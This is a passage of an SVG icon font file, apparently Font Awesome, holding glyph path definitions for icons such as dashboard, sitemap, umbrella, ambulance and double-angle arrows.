d="M1771 0q0 -53 -37 -90l-107 -108q-39 -37 -91 -37q-53 0 -90 37l-363 364q-38 36 -38 90q0 53 43 96l-256 256l-126 -126q-14 -14 -34 -14t-34 14q2 -2 12.5 -12t12.5 -13t10 -11.5t10 -13.5t6 -13.5t5.5 -16.5t1.5 -18q0 -38 -28 -68q-3 -3 -16.5 -18t-19 -20.5
t-18.5 -16.5t-22 -15.5t-22 -9t-26 -4.5q-40 0 -68 28l-408 408q-28 28 -28 68q0 13 4.5 26t9 22t15.5 22t16.5 18.5t20.5 19t18 16.5q30 28 68 28q10 0 18 -1.5t16.5 -5.5t13.5 -6t13.5 -10t11.5 -10t13 -12.5t12 -12.5q-14 14 -14 34t14 34l348 348q14 14 34 14t34 -14
q-2 2 -12.5 12t-12.5 13t-10 11.5t-10 13.5t-6 13.5t-5.5 16.5t-1.5 18q0 38 28 68q3 3 16.5 18t19 20.5t18.5 16.5t22 15.5t22 9t26 4.5q40 0 68 -28l408 -408q28 -28 28 -68q0 -13 -4.5 -26t-9 -22t-15.5 -22t-16.5 -18.5t-20.5 -19t-18 -16.5q-30 -28 -68 -28
q-10 0 -18 1.5t-16.5 5.5t-13.5 6t-13.5 10t-11.5 10t-13 12.5t-12 12.5q14 -14 14 -34t-14 -34l-126 -126l256 -256q43 43 96 43q52 0 91 -37l363 -363q37 -39 37 -91z" />
    <glyph glyph-name="dashboard" unicode="&#xf0e4;" horiz-adv-x="1792" 
d="M384 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM576 832q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1004 351l101 382q6 26 -7.5 48.5t-38.5 29.5
t-48 -6.5t-30 -39.5l-101 -382q-60 -5 -107 -43.5t-63 -98.5q-20 -77 20 -146t117 -89t146 20t89 117q16 60 -6 117t-72 91zM1664 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1024 1024q0 53 -37.5 90.5
t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1472 832q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1792 384q0 -261 -141 -483q-19 -29 -54 -29h-1402q-35 0 -54 29
q-141 221 -141 483q0 182 71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
    <glyph glyph-name="comment_alt" unicode="&#xf0e5;" horiz-adv-x="1792" 
d="M896 1152q-204 0 -381.5 -69.5t-282 -187.5t-104.5 -255q0 -112 71.5 -213.5t201.5 -175.5l87 -50l-27 -96q-24 -91 -70 -172q152 63 275 171l43 38l57 -6q69 -8 130 -8q204 0 381.5 69.5t282 187.5t104.5 255t-104.5 255t-282 187.5t-381.5 69.5zM1792 640
q0 -174 -120 -321.5t-326 -233t-450 -85.5q-70 0 -145 8q-198 -175 -460 -242q-49 -14 -114 -22h-5q-15 0 -27 10.5t-16 27.5v1q-3 4 -0.5 12t2 10t4.5 9.5l6 9t7 8.5t8 9q7 8 31 34.5t34.5 38t31 39.5t32.5 51t27 59t26 76q-157 89 -247.5 220t-90.5 281q0 174 120 321.5
t326 233t450 85.5t450 -85.5t326 -233t120 -321.5z" />
    <glyph glyph-name="comments_alt" unicode="&#xf0e6;" horiz-adv-x="1792" 
d="M704 1152q-153 0 -286 -52t-211.5 -141t-78.5 -191q0 -82 53 -158t149 -132l97 -56l-35 -84q34 20 62 39l44 31l53 -10q78 -14 153 -14q153 0 286 52t211.5 141t78.5 191t-78.5 191t-211.5 141t-286 52zM704 1280q191 0 353.5 -68.5t256.5 -186.5t94 -257t-94 -257
t-256.5 -186.5t-353.5 -68.5q-86 0 -176 16q-124 -88 -278 -128q-36 -9 -86 -16h-3q-11 0 -20.5 8t-11.5 21q-1 3 -1 6.5t0.5 6.5t2 6l2.5 5t3.5 5.5t4 5t4.5 5t4 4.5q5 6 23 25t26 29.5t22.5 29t25 38.5t20.5 44q-124 72 -195 177t-71 224q0 139 94 257t256.5 186.5
t353.5 68.5zM1526 111q10 -24 20.5 -44t25 -38.5t22.5 -29t26 -29.5t23 -25q1 -1 4 -4.5t4.5 -5t4 -5t3.5 -5.5l2.5 -5t2 -6t0.5 -6.5t-1 -6.5q-3 -14 -13 -22t-22 -7q-50 7 -86 16q-154 40 -278 128q-90 -16 -176 -16q-271 0 -472 132q58 -4 88 -4q161 0 309 45t264 129
q125 92 192 212t67 254q0 77 -23 152q129 -71 204 -178t75 -230q0 -120 -71 -224.5t-195 -176.5z" />
    <glyph glyph-name="bolt" unicode="&#xf0e7;" horiz-adv-x="896" 
d="M885 970q18 -20 7 -44l-540 -1157q-13 -25 -42 -25q-4 0 -14 2q-17 5 -25.5 19t-4.5 30l197 808l-406 -101q-4 -1 -12 -1q-18 0 -31 11q-18 15 -13 39l201 825q4 14 16 23t28 9h328q19 0 32 -12.5t13 -29.5q0 -8 -5 -18l-171 -463l396 98q8 2 12 2q19 0 34 -15z" />
    <glyph glyph-name="sitemap" unicode="&#xf0e8;" horiz-adv-x="1792" 
d="M1792 288v-320q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h96v192h-512v-192h96q40 0 68 -28t28 -68v-320q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h96v192h-512v-192h96q40 0 68 -28t28 -68v-320
q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h96v192q0 52 38 90t90 38h512v192h-96q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h320q40 0 68 -28t28 -68v-320q0 -40 -28 -68t-68 -28h-96v-192h512q52 0 90 -38t38 -90v-192h96q40 0 68 -28t28 -68
z" />
    <glyph glyph-name="umbrella" unicode="&#xf0e9;" horiz-adv-x="1664" 
d="M896 708v-580q0 -104 -76 -180t-180 -76t-180 76t-76 180q0 26 19 45t45 19t45 -19t19 -45q0 -50 39 -89t89 -39t89 39t39 89v580q33 11 64 11t64 -11zM1664 681q0 -13 -9.5 -22.5t-22.5 -9.5q-11 0 -23 10q-49 46 -93 69t-102 23q-68 0 -128 -37t-103 -97
q-7 -10 -17.5 -28t-14.5 -24q-11 -17 -28 -17q-18 0 -29 17q-4 6 -14.5 24t-17.5 28q-43 60 -102.5 97t-127.5 37t-127.5 -37t-102.5 -97q-7 -10 -17.5 -28t-14.5 -24q-11 -17 -29 -17q-17 0 -28 17q-4 6 -14.5 24t-17.5 28q-43 60 -103 97t-128 37q-58 0 -102 -23t-93 -69
q-12 -10 -23 -10q-13 0 -22.5 9.5t-9.5 22.5q0 5 1 7q45 183 172.5 319.5t298 204.5t360.5 68q140 0 274.5 -40t246.5 -113.5t194.5 -187t115.5 -251.5q1 -2 1 -7zM896 1408v-98q-42 2 -64 2t-64 -2v98q0 26 19 45t45 19t45 -19t19 -45z" />
    <glyph glyph-name="paste" unicode="&#xf0ea;" horiz-adv-x="1792" 
d="M768 -128h896v640h-416q-40 0 -68 28t-28 68v416h-384v-1152zM1024 1312v64q0 13 -9.5 22.5t-22.5 9.5h-704q-13 0 -22.5 -9.5t-9.5 -22.5v-64q0 -13 9.5 -22.5t22.5 -9.5h704q13 0 22.5 9.5t9.5 22.5zM1280 640h299l-299 299v-299zM1792 512v-672q0 -40 -28 -68t-68 -28
h-960q-40 0 -68 28t-28 68v160h-544q-40 0 -68 28t-28 68v1344q0 40 28 68t68 28h1088q40 0 68 -28t28 -68v-328q21 -13 36 -28l408 -408q28 -28 48 -76t20 -88z" />
    <glyph glyph-name="light_bulb" unicode="&#xf0eb;" horiz-adv-x="1024" 
d="M736 960q0 -13 -9.5 -22.5t-22.5 -9.5t-22.5 9.5t-9.5 22.5q0 46 -54 71t-106 25q-13 0 -22.5 9.5t-9.5 22.5t9.5 22.5t22.5 9.5q50 0 99.5 -16t87 -54t37.5 -90zM896 960q0 72 -34.5 134t-90 101.5t-123 62t-136.5 22.5t-136.5 -22.5t-123 -62t-90 -101.5t-34.5 -134
q0 -101 68 -180q10 -11 30.5 -33t30.5 -33q128 -153 141 -298h228q13 145 141 298q10 11 30.5 33t30.5 33q68 79 68 180zM1024 960q0 -155 -103 -268q-45 -49 -74.5 -87t-59.5 -95.5t-34 -107.5q47 -28 47 -82q0 -37 -25 -64q25 -27 25 -64q0 -52 -45 -81q13 -23 13 -47
q0 -46 -31.5 -71t-77.5 -25q-20 -44 -60 -70t-87 -26t-87 26t-60 70q-46 0 -77.5 25t-31.5 71q0 24 13 47q-45 29 -45 81q0 37 25 64q-25 27 -25 64q0 54 47 82q-4 50 -34 107.5t-59.5 95.5t-74.5 87q-103 113 -103 268q0 99 44.5 184.5t117 142t164 89t186.5 32.5
t186.5 -32.5t164 -89t117 -142t44.5 -184.5z" />
    <glyph glyph-name="exchange" unicode="&#xf0ec;" horiz-adv-x="1792" 
d="M1792 352v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5q-12 0 -24 10l-319 320q-9 9 -9 22q0 14 9 23l320 320q9 9 23 9q13 0 22.5 -9.5t9.5 -22.5v-192h1376q13 0 22.5 -9.5t9.5 -22.5zM1792 896q0 -14 -9 -23l-320 -320q-9 -9 -23 -9
q-13 0 -22.5 9.5t-9.5 22.5v192h-1376q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1376v192q0 14 9 23t23 9q12 0 24 -10l319 -319q9 -9 9 -23z" />
    <glyph glyph-name="cloud_download" unicode="&#xf0ed;" horiz-adv-x="1920" 
d="M1280 608q0 14 -9 23t-23 9h-224v352q0 13 -9.5 22.5t-22.5 9.5h-192q-13 0 -22.5 -9.5t-9.5 -22.5v-352h-224q-13 0 -22.5 -9.5t-9.5 -22.5q0 -14 9 -23l352 -352q9 -9 23 -9t23 9l351 351q10 12 10 24zM1920 384q0 -159 -112.5 -271.5t-271.5 -112.5h-1088
q-185 0 -316.5 131.5t-131.5 316.5q0 130 70 240t188 165q-2 30 -2 43q0 212 150 362t362 150q156 0 285.5 -87t188.5 -231q71 62 166 62q106 0 181 -75t75 -181q0 -76 -41 -138q130 -31 213.5 -135.5t83.5 -238.5z" />
    <glyph glyph-name="cloud_upload" unicode="&#xf0ee;" horiz-adv-x="1920" 
d="M1280 672q0 14 -9 23l-352 352q-9 9 -23 9t-23 -9l-351 -351q-10 -12 -10 -24q0 -14 9 -23t23 -9h224v-352q0 -13 9.5 -22.5t22.5 -9.5h192q13 0 22.5 9.5t9.5 22.5v352h224q13 0 22.5 9.5t9.5 22.5zM1920 384q0 -159 -112.5 -271.5t-271.5 -112.5h-1088
q-185 0 -316.5 131.5t-131.5 316.5q0 130 70 240t188 165q-2 30 -2 43q0 212 150 362t362 150q156 0 285.5 -87t188.5 -231q71 62 166 62q106 0 181 -75t75 -181q0 -76 -41 -138q130 -31 213.5 -135.5t83.5 -238.5z" />
    <glyph glyph-name="user_md" unicode="&#xf0f0;" horiz-adv-x="1408" 
d="M384 192q0 -26 -19 -45t-45 -19t-45 19t-19 45t19 45t45 19t45 -19t19 -45zM1408 131q0 -121 -73 -190t-194 -69h-874q-121 0 -194 69t-73 190q0 68 5.5 131t24 138t47.5 132.5t81 103t120 60.5q-22 -52 -22 -120v-203q-58 -20 -93 -70t-35 -111q0 -80 56 -136t136 -56
t136 56t56 136q0 61 -35.5 111t-92.5 70v203q0 62 25 93q132 -104 295 -104t295 104q25 -31 25 -93v-64q-106 0 -181 -75t-75 -181v-89q-32 -29 -32 -71q0 -40 28 -68t68 -28t68 28t28 68q0 42 -32 71v89q0 52 38 90t90 38t90 -38t38 -90v-89q-32 -29 -32 -71q0 -40 28 -68
t68 -28t68 28t28 68q0 42 -32 71v89q0 68 -34.5 127.5t-93.5 93.5q0 10 0.5 42.5t0 48t-2.5 41.5t-7 47t-13 40q68 -15 120 -60.5t81 -103t47.5 -132.5t24 -138t5.5 -131zM1088 1024q0 -159 -112.5 -271.5t-271.5 -112.5t-271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5
t271.5 -112.5t112.5 -271.5z" />
    <glyph glyph-name="stethoscope" unicode="&#xf0f1;" horiz-adv-x="1408" 
d="M1280 832q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 832q0 -62 -35.5 -111t-92.5 -70v-395q0 -159 -131.5 -271.5t-316.5 -112.5t-316.5 112.5t-131.5 271.5v132q-164 20 -274 128t-110 252v512q0 26 19 45t45 19q6 0 16 -2q17 30 47 48
t65 18q53 0 90.5 -37.5t37.5 -90.5t-37.5 -90.5t-90.5 -37.5q-33 0 -64 18v-402q0 -106 94 -181t226 -75t226 75t94 181v402q-31 -18 -64 -18q-53 0 -90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5q35 0 65 -18t47 -48q10 2 16 2q26 0 45 -19t19 -45v-512q0 -144 -110 -252
t-274 -128v-132q0 -106 94 -181t226 -75t226 75t94 181v395q-57 21 -92.5 70t-35.5 111q0 80 56 136t136 56t136 -56t56 -136z" />
    <glyph glyph-name="suitcase" unicode="&#xf0f2;" horiz-adv-x="1792" 
d="M640 1152h512v128h-512v-128zM288 1152v-1280h-64q-92 0 -158 66t-66 158v832q0 92 66 158t158 66h64zM1408 1152v-1280h-1024v1280h128v160q0 40 28 68t68 28h576q40 0 68 -28t28 -68v-160h128zM1792 928v-832q0 -92 -66 -158t-158 -66h-64v1280h64q92 0 158 -66
t66 -158z" />
    <glyph glyph-name="bell_alt" unicode="&#xf0f3;" horiz-adv-x="1792" 
d="M912 -160q0 16 -16 16q-59 0 -101.5 42.5t-42.5 101.5q0 16 -16 16t-16 -16q0 -73 51.5 -124.5t124.5 -51.5q16 0 16 16zM1728 128q0 -52 -38 -90t-90 -38h-448q0 -106 -75 -181t-181 -75t-181 75t-75 181h-448q-52 0 -90 38t-38 90q50 42 91 88t85 119.5t74.5 158.5
t50 206t19.5 260q0 152 117 282.5t307 158.5q-8 19 -8 39q0 40 28 68t68 28t68 -28t28 -68q0 -20 -8 -39q190 -28 307 -158.5t117 -282.5q0 -139 19.5 -260t50 -206t74.5 -158.5t85 -119.5t91 -88z" />
    <glyph glyph-name="coffee" unicode="&#xf0f4;" horiz-adv-x="1920" 
d="M1664 896q0 80 -56 136t-136 56h-64v-384h64q80 0 136 56t56 136zM0 128h1792q0 -106 -75 -181t-181 -75h-1280q-106 0 -181 75t-75 181zM1856 896q0 -159 -112.5 -271.5t-271.5 -112.5h-64v-32q0 -92 -66 -158t-158 -66h-704q-92 0 -158 66t-66 158v736q0 26 19 45
t45 19h1152q159 0 271.5 -112.5t112.5 -271.5z" />
    <glyph glyph-name="food" unicode="&#xf0f5;" horiz-adv-x="1408" 
d="M640 1472v-640q0 -61 -35.5 -111t-92.5 -70v-779q0 -52 -38 -90t-90 -38h-128q-52 0 -90 38t-38 90v779q-57 20 -92.5 70t-35.5 111v640q0 26 19 45t45 19t45 -19t19 -45v-416q0 -26 19 -45t45 -19t45 19t19 45v416q0 26 19 45t45 19t45 -19t19 -45v-416q0 -26 19 -45
t45 -19t45 19t19 45v416q0 26 19 45t45 19t45 -19t19 -45zM1408 1472v-1600q0 -52 -38 -90t-90 -38h-128q-52 0 -90 38t-38 90v512h-224q-13 0 -22.5 9.5t-9.5 22.5v800q0 132 94 226t226 94h256q26 0 45 -19t19 -45z" />
    <glyph glyph-name="file_text_alt" unicode="&#xf0f6;" 
d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z
M384 736q0 14 9 23t23 9h704q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-704q-14 0 -23 9t-9 23v64zM1120 512q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-704q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h704zM1120 256q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-704
q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h704z" />
    <glyph glyph-name="building" unicode="&#xf0f7;" horiz-adv-x="1408" 
d="M384 224v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M640 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M1152 224v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM896 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M640 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 992v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M1152 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM896 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M640 992v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 1248v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M1152 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM896 992v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M640 1248v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1152 992v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M896 1248v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1152 1248v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M896 -128h384v1536h-1152v-1536h384v224q0 13 9.5 22.5t22.5 9.5h320q13 0 22.5 -9.5t9.5 -22.5v-224zM1408 1472v-1664q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v1664q0 26 19 45t45 19h1280q26 0 45 -19t19 -45z" />
    <glyph glyph-name="hospital" unicode="&#xf0f8;" horiz-adv-x="1408" 
d="M384 224v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M640 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M1152 224v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM896 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M640 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1152 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M896 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1152 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M896 -128h384v1152h-256v-32q0 -40 -28 -68t-68 -28h-448q-40 0 -68 28t-28 68v32h-256v-1152h384v224q0 13 9.5 22.5t22.5 9.5h320q13 0 22.5 -9.5t9.5 -22.5v-224zM896 1056v320q0 13 -9.5 22.5t-22.5 9.5h-64q-13 0 -22.5 -9.5t-9.5 -22.5v-96h-128v96q0 13 -9.5 22.5
t-22.5 9.5h-64q-13 0 -22.5 -9.5t-9.5 -22.5v-320q0 -13 9.5 -22.5t22.5 -9.5h64q13 0 22.5 9.5t9.5 22.5v96h128v-96q0 -13 9.5 -22.5t22.5 -9.5h64q13 0 22.5 9.5t9.5 22.5zM1408 1088v-1280q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v1280q0 26 19 45t45 19h320
v288q0 40 28 68t68 28h448q40 0 68 -28t28 -68v-288h320q26 0 45 -19t19 -45z" />
    <glyph glyph-name="ambulance" unicode="&#xf0f9;" horiz-adv-x="1920" 
d="M640 128q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM256 640h384v256h-158q-14 -2 -22 -9l-195 -195q-7 -12 -9 -22v-30zM1536 128q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5
t90.5 37.5t37.5 90.5zM1664 800v192q0 14 -9 23t-23 9h-224v224q0 14 -9 23t-23 9h-192q-14 0 -23 -9t-9 -23v-224h-224q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h224v-224q0 -14 9 -23t23 -9h192q14 0 23 9t9 23v224h224q14 0 23 9t9 23zM1920 1344v-1152
q0 -26 -19 -45t-45 -19h-192q0 -106 -75 -181t-181 -75t-181 75t-75 181h-384q0 -106 -75 -181t-181 -75t-181 75t-75 181h-128q-26 0 -45 19t-19 45t19 45t45 19v416q0 26 13 58t32 51l198 198q19 19 51 32t58 13h160v320q0 26 19 45t45 19h1152q26 0 45 -19t19 -45z" />
    <glyph glyph-name="medkit" unicode="&#xf0fa;" horiz-adv-x="1792" 
d="M1280 416v192q0 14 -9 23t-23 9h-224v224q0 14 -9 23t-23 9h-192q-14 0 -23 -9t-9 -23v-224h-224q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h224v-224q0 -14 9 -23t23 -9h192q14 0 23 9t9 23v224h224q14 0 23 9t9 23zM640 1152h512v128h-512v-128zM256 1152v-1280h-32
q-92 0 -158 66t-66 158v832q0 92 66 158t158 66h32zM1440 1152v-1280h-1088v1280h160v160q0 40 28 68t68 28h576q40 0 68 -28t28 -68v-160h160zM1792 928v-832q0 -92 -66 -158t-158 -66h-32v1280h32q92 0 158 -66t66 -158z" />
    <glyph glyph-name="fighter_jet" unicode="&#xf0fb;" horiz-adv-x="1920" 
d="M1920 576q-1 -32 -288 -96l-352 -32l-224 -64h-64l-293 -352h69q26 0 45 -4.5t19 -11.5t-19 -11.5t-45 -4.5h-96h-160h-64v32h64v416h-160l-192 -224h-96l-32 32v192h32v32h128v8l-192 24v128l192 24v8h-128v32h-32v192l32 32h96l192 -224h160v416h-64v32h64h160h96
q26 0 45 -4.5t19 -11.5t-19 -11.5t-45 -4.5h-69l293 -352h64l224 -64l352 -32q128 -28 200 -52t80 -34z" />
    <glyph glyph-name="beer" unicode="&#xf0fc;" horiz-adv-x="1664" 
d="M640 640v384h-256v-256q0 -53 37.5 -90.5t90.5 -37.5h128zM1664 192v-192h-1152v192l128 192h-128q-159 0 -271.5 112.5t-112.5 271.5v320l-64 64l32 128h480l32 128h960l32 -192l-64 -32v-800z" />
    <glyph glyph-name="h_sign" unicode="&#xf0fd;" 
d="M1280 192v896q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-320h-512v320q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-896q0 -26 19 -45t45 -19h128q26 0 45 19t19 45v320h512v-320q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1536 1120v-960
q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="f0fe" unicode="&#xf0fe;" 
d="M1280 576v128q0 26 -19 45t-45 19h-320v320q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-320h-320q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h320v-320q0 -26 19 -45t45 -19h128q26 0 45 19t19 45v320h320q26 0 45 19t19 45zM1536 1120v-960
q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="double_angle_left" unicode="&#xf100;" horiz-adv-x="1024" 
d="M627 160q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l50 -50q10 -10 10 -23t-10 -23l-393 -393l393 -393q10 -10 10 -23zM1011 160q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23
t10 23l466 466q10 10 23 10t23 -10l50 -50q10 -10 10 -23t-10 -23l-393 -393l393 -393q10 -10 10 -23z" />
    <glyph glyph-name="double_angle_right" unicode="&#xf101;" horiz-adv-x="1024" 
d="M595 576q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23zM979 576q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23
l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23z" />
    <glyph glyph-name="double_angle_up" unicode="&#xf102;" horiz-adv-x="1152" 
d="M1075 224q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-393 393l-393 -393q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l466 -466q10 -10 10 -23zM1075 608q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-393 393l-393 -393
q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l466 -466q10 -10 10 -23z" />
    <glyph glyph-name="double_angle_down" unicode="&#xf103;" horiz-adv-x="1152" 
